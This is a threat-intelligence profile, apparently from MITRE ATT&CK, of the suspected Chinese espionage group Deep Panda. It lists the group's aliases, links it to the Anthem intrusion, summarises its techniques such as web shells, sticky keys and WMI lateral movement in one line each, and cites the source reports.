Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.  The intrusion into healthcare company Anthem has been attributed to Deep Panda.  This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther.  Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion.  Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information if the groups are the same. 
Associated Group Descriptions
|Enterprise||T1015||Accessibility Features||Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.|
|Enterprise||T1066||Indicator Removal from Tools||Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.|
|Enterprise||T1086||PowerShell||Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.|
|Enterprise||T1057||Process Discovery||Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.|
|Enterprise||T1117||Regsvr32||Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.|
|Enterprise||T1018||Remote System Discovery||Deep Panda has used ping to identify other machines of interest.|
|Enterprise||T1064||Scripting||Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.|
|Enterprise||T1100||Web Shell||Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.|
|Enterprise||T1077||Windows Admin Shares||Deep Panda uses net.exe to connect to network shares using |
|Enterprise||T1047||Windows Management Instrumentation||The Deep Panda group is known to utilize WMI for lateral movement.|
- Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
- ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
- RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.
- DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
- Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
- RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.